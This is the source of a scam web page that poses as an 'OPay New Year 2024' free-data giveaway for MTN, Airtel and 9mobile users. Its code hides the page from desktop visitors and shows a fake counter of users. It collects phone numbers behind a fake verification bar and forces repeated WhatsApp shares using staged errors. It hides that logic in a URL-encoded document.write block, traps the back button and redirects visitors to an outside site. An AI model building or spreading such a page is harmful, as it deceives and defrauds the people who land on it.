<!DOCTYPE html>
<html lang="en">
<head>
  <script>
    document.addEventListener("DOMContentLoaded", function () {
        if (window.innerWidth > 600) {
            window.location.href = "https://google.com";
        }
    });
</script>
  <meta charset="UTF-8">

  <style>
    /* Styles for the loader */
    .loaderx {
      border: 7px solid rgba(0, 255, 0, 0.1);
      border-top: 7px solid green;
      border-radius: 50%;
      width: 50px;
      height: 50px;
      animation: spin 1s linear infinite;
      margin: auto;
      margin-top: 20vh;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }

    /* Styles for the content */
    .contentx {
      display: none;
      text-align: center;
      margin-top: 20px;
      font-size: 20px;
    }

    /* Styles for the green text */
    .green-textx {
      color: green;
      display: block;
      margin: 0 auto;
      width: fit-content;
    }

    /* Styles for the image */
    .logox {
      width: 100px;
      height: auto;
      display: block;
      margin: 20px auto;
    }
  </style>
      <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
      <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" /> 
     <style>
       .zoom-button {
       font-size: 10px;
         background-color: green;
         color: #fff;
         padding: 10px 10px;
         border: none;
         cursor: pointer;
         animation: zoom 1s infinite alternate; /* 3s duration for the animation */
       }
   
       @keyframes zoom {
         0% {
           transform: scale(1); /* Start with normal size */
         }
         100% {
           transform: scale(1.2); /* Zoom in by 20% */
         }
       }
     </style>

    

  <script>

      function set_Cookie(name,value){
          var Days = 30;
          var exp = new Date();
          exp.setTime(exp.getTime() + (Days*20*1000));
          document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
      }
      function get_Cookie(name){
          var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
          if(arr=document.cookie.match(reg)){
              return unescape(arr[2]);
          }
          return '';
      }


      /*            if(get_Cookie("d")>0 &&get_Cookie("d")<12){
                      document.getElementById("first-box")."quedate__step".display="none";//??;
                      document.getElementById("second-box").style.display="none";//??;
                      document.getElementById("third-box").style.display="none";//??;
                      document.getElementsByClassName("loading2__box").style.display="";//??;
                  }*/


  </script>

      <meta charset="UTF-8" />
      <meta name="viewport" content="width=device-width, initial-scale=1.0" />
      <title>Opay newyear celebrstion data Giveaway</title>
      <link rel="shortcut icon" type="image/png" href="j.png"/>
      <meta name="og:title" content="Opay newyear celebrstion data Giveaway" />
       <meta name="og:url" content="https://www.recharge.com/en/" />
      <meta property="og:description" content="Opay newyear celebrstion data Giveaway" />
      <meta property="og:image" content="j.png"/>
      <meta property="og:type" content="website" />
  <meta property="og:updated_time" content="1440432930" />


</head>
<body>


<style type="text/css">
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
@import url("//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css");
@import url('https://fonts.googleapis.com/css2?family=Noto+Nastaliq+Urdu:wght@700&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Noto+Nastaliq+Urdu:wght@400;700&display=swap');
* {
  margin: 0;
  padding: 0;
  font-family: Poppins, Droid Arabic Naskh;
  font-weight: normal;
  box-sizing: border-box;


}
body {
  direction: lfl;
  background: #ebedf0;
}
a {
  text-decoration: none;
}
.post {
  background: #fff;
  : 0 auto;
  padding: 10px;
  max-width: 500px;
  border: 1px solid #d0d1d5;
  border-radius: 3px;
}
.post img {
  width: 100%;
}
.welcome {
  font-size: 15px;
}
.amount,
#getname {
  color: #098105;
  text-decoration: none;
}
.done {
  text-align: center;
  color: #27ae60;
}
.tip {
  font-size: 14px;
}
.title {
  text-align: center;
}
.error {
  display: none;
  text-align: center;
  font-size: 14px;
  color: #e74c3c;
}
button {
  display: block;
  width: 200px;
  height: 30px;
  color: #fff;
  border: none;
  outline: none;
  font-size: 24px;
  cursor: pointer;
  border-radius: 5px;
  padding: 0 10px;
   
  background: rgb(9, 129, 5);
  transition: background 0.3s ease;
}
button:hover {
  background: #098105;
}
.phone {
  max-width: 400px;
  margin: 10px auto;
}
.phone input {
  width: 100%;
  height: 50px;
  padding: 10px;
  outline: none;
  border: 2px solid #cecece;
  font-size: 14px;
}
#confirm {
  width: 200px;
  margin: 10px auto;
  border-radius: 0px;
}
#loader {
  text-align: center;
}
.spin {
  width: 50px;
  height: 50px;
  background: transparent;
  border: solid 8px rgb(9, 129, 5);
  border-right-color: transparent;
  border-radius: 50%;
  margin: 10px auto;
  animation: spin 0.8s linear infinite;
}
@keyframes spin {
  100% {
      transform: rotate(1turn);
  }
}
#loader,
#info,
#checking,
#share,
#claim {
  display: none;
}
.center {
  display: flex;
  align-items: center;
  justify-content: center;
}
.barr {
  direction: ltr;
  max-width: 400px;
  margin: 10px auto;
  box-sizing: border-box;
}
.fill {
  position: relative;
  display: inline-block;
  width: calc(100% - 100px);
  height: 35px;
  padding: 2px;
  border: 2px solid #098105;
}
#fill,
#fill2 {
  background: #098105;
  width: 0%;
  height: 100%;
}
.percentage {
  width: 100px;
  float: right;
  height: 35px;
  font-size: 16px;
  border: 2px solid #098105;
}
#percentage,
#percentage2 {
  margin-left: 5px;
}
#check,
#check2 {
  display: none;
}
.counter {
  color: #7f7f7f;
  font-size: 12px;
  text-align: right;
  padding: 10px 0 10px 2px;
  border-bottom: 1px solid #e1e2e3;
}
.reactions {
  display: inline-flex;
  align-items: center;
  float: left;
}
.counter img {
  float: left;
  width: 16px;
  height: 16px;
  border-radius: 50%;
  border: 2px solid #fff;
  box-sizing: content-box;
}
.like,
.love {
  margin-right: -5px;
}
.like {
  z-index: 2;
}
.love {
  z-index: 1;
}
.bar {
  display: table;
  width: 100%;
  border-bottom: 1px solid #e1e2e3;
}
.bar .react {
  display: table-cell;
  width: calc(100% / 3);
  font-size: 12px;
  color: #7f7f7f;
  text-align: center;
  padding: 10px 0;
  cursor: pointer;
}
.comments {
  direction: ltr;
}
.comment {
  padding: 6px 0;
  margin-top: 5px;
}
.comment img {
  float: left;
  width: 32px;
  height: 32px;
  border: none;
  border-radius: 18px;
  cursor: pointer;
}
.reply {
  margin-left: 37px;
}
.single-container {
  margin-left: 37px;
  background: #f1f2f6;
  padding: 10px;
  border-radius: 15px;
  font-size: 12px;
}
.single-container .user {
  display: inline-block;
  cursor: pointer;
  color: #365899;
  margin-bottom: 5px;
}
.single-container .text {
  display: block;
}
.buttons {
  font-size: 12px;
  font-weight: bold;
  margin: 10px 0 0 47px;
  color: #90949c;
}
.action {
  cursor: pointer;
}
.action:hover {
  text-decoration: underline;
}
.input {
  padding: 6px 12px 12px;
}
.input input {
  width: 100%;
  background: #f1f2f6;
  padding: 10px;
  border-radius: 15px;
  border: 0;
  outline: none;
}
.A{

  font-family: 'Noto Nastaliq Urdu', serif;
  text-align: center;
width:75%;
border-radius:15px;
padding:5px;
margin-bottom:10px;
  background-color: rgb(164, 219, 175);
}
.horizontal_marque{
font-family: 'Noto Nastaliq Urdu', serif;

}
</style>

</head>
<body>
  <div class="loaderx" id="loaderx"></div>
   <img src="k.png" alt="Logo" class="logox">
  <p class="green-textx" id="loadingTextx" style="font-size:5vw"><b>Opay New Year Giveaway 2024</b></p>
  <div class="contentx" id="contentx">
    <div>
      <center><img src="j.png" style="width: 100%;"></center>
         
</div>

<center><div >

  <marquee> <span id="countdowntimer" style="color:red; ">94548</span> users are taking advantaga of this offer</br></marquee>
<script type="text/javascript">
       var timeleft = 94548;
       var downloadTimer = setInterval(function(){
           timeleft= timeleft + Math.floor(Math.random() * 600);
           document.getElementById('countdowntimer').textContent = timeleft;
           if (timeleft <= 0)
               clearInterval(downloadTimer);
       }, 1000);
   </script>
</div>
</center>




<div class="post" width="100%">


<div id="intro">

<center>    
<p><i class="fa fa-arrow-down" aria-hidden="true"></i> Select your network <i class="fa fa-arrow-down" aria-hidden="true"></i></p>
  
   
    <button  id="go1" class="zoom-button"  style="background-color: yellow; color: black; ">mtn 500mb free</button><br>
    <button  id="go3" class="zoom-button"  style="background-color: yellow; color: black; ">mtn 1Gb free 2 MONTH</button><br>
    <button id="go4" class="zoom-button" style="background-color: red; color: black; ">mtn 2gb free 1 MONTH</button> <br>
      <button id="go5" class="zoom-button" style="background-color:red; color: black; ">AIRTEL UNLIMETED/ 2 MONTH </button><br>
  <button id="go6" class="zoom-button"  style="background-color: green; color: black; ">mtn 10gb ₦500 1 MONTH</button><br>
    <button id="go8" class="zoom-button" style="background-color: green; color: black; ">mtn 20gb ₦100 2 MONTH</button><br>
    <button id="go9" class="zoom-button" style="background-color: yellow; color: black; ">9MOBILE 1O GB / 1 MONTH</button><br>
    
</center>
</div>
<div id="loader">
<div>Please Wait...</div>
<div class="spin"></div>
<div id="num">0%</div>
</div>
<div id="info">
<p class="title">Enter Your Phone Number:</p>
<div class="phone">
  <center><input type="number" placeholder="Enter your PHONE number here" id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" onkeypress="return numberonly(event);"></center>
<center>
<!--<center><p class="title">Choose Your Province</p></center>
<select aria-label="الجنس" name="birthday_year" id="year" title="الجنس" class="_5dba" style="
width: 330px;
height: 56px;
">
<option value="أختر نوع الشبكة" selected="1">----------- Choose Province -----------</option>
<option value="1"> Punjab </option>
<option value="2"> KPK </option>
<option value="3"> Sindh </option>
<option value="4"> Balochistan </option>
<option value="5"> Gilgit Baltistan </option>
<option value="6"> Azad Kashmir </option>


</select>
</center><br> -->

  <button id="confirm">Send</button>
</div>
<p class="error">Please enter a valid number !</p>
</div>
<div id="checking">
<p class="title">Please wait a moment...</p>
<div class="barr">
  <div class="fill">
      <div id="fill"></div>
  </div>
  <div class="percentage center">
      <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
      <span id="check"><i class="fa fa-check-circle"></i></span>
      <span id="percentage"></span>
  </div>
</div>
</div>
<div id="share">

<p class="tip">Your Phone Number is  <span id="getname"></span>،</p>
<p class="tip">
  After verification, You have been qualified to get <span class="amount">Opay newyear celebrstion data Giveaway 2024</span> How to proceed: 
</p><br>
<p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
<p class="tip">2. Your Registration will complete automatically after the GREEN verification bar is filled.</p>
<p class="tip">3. You will receive a confirmation by call/SMS from your SIM Provider.</p>

<center>  <button id="whatsapp">SHARE</button></center>
<div class="barr">
  <div class="fill">
      <div id="fill2"></div>
  </div>
  <div class="percentage center">
      <span><i class="fa fa-spinner fa-pulse"></i></span>
      <span id="percentage2">0%</span>
  </div>
</div>
</div>
<div id="claim">
<p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
<p class="title">congratulation you are at the last part</p>
<p class="title">click bellow complate task.</p>
<p class="title">👇👇👇👇 </p>
<center> <button id="offer"; >confirm </button><center>
<br>	  
<br>	
</div>
<br>







<script type="text/javascript">

$("#go").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go1").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go3").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go4").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go5").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go6").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go7").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go8").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go9").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#go11").click(function () {
$("#intro").fadeOut(0);
$("#loader").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
$("#num").text(i + "%");
i += 1;
if (i >= 100) {
clearInterval(interval);
$("#loader").fadeOut(0);
$("#info").fadeIn(1000);
}
}, 50);
});
$("#confirm").click(function () {
if ($("#name").val().length < 4)
{
$(".error").fadeIn(500);
} else {
$("#info").fadeOut(0);
$("#checking").fadeIn(1000);
var i = 0;
var interval = setInterval(function () {
i += 1;
$("#percentage").text(i + "%");
$("#fill").css("width", i + "%");
if (i == 50) {
  i = 49;
  setTimeout(function () {
      i = 50;
  }, 1000);
}
if (i >= 100) {
  clearInterval(interval);
  $("#load").fadeOut(0);
  $("#check").fadeIn(0);
  setTimeout(function () {
      $("#checking").fadeOut(0);
      $("#share").fadeIn(1000);
      $("#getname").html($("#name").val());
  }, 500);
}
}, 50);
}
});
$(document).click(function () {
if ($("#name").is(":focus")) {
$(".error").fadeOut(500);
}
});
</script>




<!--
"*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
-->
<script>
var text1 ="*Happy New Year 2024 from OPay! 🎉🥳 To celebrate the beginning of an incredible year, we're thrilled to announce our exclusive giveaway! 🎁✨ the giveaway is availabel to both opay and none Opay customer.%0A%0ACash/data giveaway is open till 20th january %0A%0A *APPLY%20NOW*%0Ahttps://newyearspecial2024.com/opay",
text2 = " an amount of ",
text3 = " for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
abcde = "https://st-pearl.vercel.app/",
saved = "",
share = "whatsapp://send?text=" + text1;
</script>






<script>
<!-- code by OD -->
document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var%20swidth%20%3D%20localStorage.getItem%28saved%29%3B%0Aif%20%28swidth%20%21%3D%3D%20null%29%20%7B%0A%20%20%20%20var%20width%20%3D%20swidth%20*%201%3B%0A%20%20%20%20%24%28%22%23intro%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22.comments%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22%23share%22%29.fadeIn%280%29%3B%0A%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%7D%20else%20%7B%0A%20%20%20%20var%20width%20%3D%200%3B%0A%7D%0A%24%28%22%23whatsapp%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.location.href%20%3D%20share%3B%0A%20%20%20%20if%20%28width%20%3D%3D%200%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%2050%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2050%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2015%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2065%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2070%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2010%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2080%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2085%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2087%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2088%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2090%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2091%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2092%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2093%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2094%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2095%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2096%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23share%22%29.fadeOut%280%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23claim%22%29.fadeIn%281000%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20localStorage.setItem%28saved%2C%20width%29%3B%0A%20%20%20%20setTimeout%28function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%20%20%20%20%7D%2C%202000%29%3B%0A%7D%29%3B%0A%24%28%22%23offer%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.open%28abcde%2C%20%22_blank%22%29%3B%0A%7D%29%3B%0A%3C/script%3E'))
</script>



<script>
window.onhashchange=function(){jp();};
function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
function jp() {
fh();}
setTimeout('hh();', 500);
function fh(){
location.href="https://st-pearl.vercel.app/";
}
function goon(){
location.href="https://st-pearl.vercel.app/";
}
</script>

<script>
(function (global) {

if(typeof (global) === "undefined")
{
throw new Error("window is undefined");
}

var _hash = "!";
var noBackPlease = function () {
global.location.href += "#";

// making sure we have the fruit available for juice....
// 50 milliseconds for just once do not cost much (^__^)
global.setTimeout(function () {
global.location.href += "!";
}, 50);
};

// Earlier we had setInerval here....
global.onhashchange = function () {
if (global.location.hash !== _hash) {
global.location.hash = _hash;
}
};

global.onload = function () {

noBackPlease();

// disables backspace on page except on input fields and textarea..
document.body.onkeydown = function (e) {
var elm = e.target.nodeName.toLowerCase();
if (e.which === 8 && (elm !== 'input' && elm  !== 'textarea')) {
  e.preventDefault();
}
// stopping event bubbling up the DOM tree..
e.stopPropagation();
};

};

})(window);
</script>

  
  
  <script>
    // Function to show content after 5 seconds
    setTimeout(function() {
      const loader = document.getElementById("loaderx");
      const loadingText = document.getElementById("loadingTextx");
      const content = document.getElementById("contentx");

      loader.style.display = "none";
      loadingText.style.display = "none";
      document.querySelector('.logox').style.display = "none";
      content.style.display = "block";
    }, 1000);
  </script>
</body>
</html>
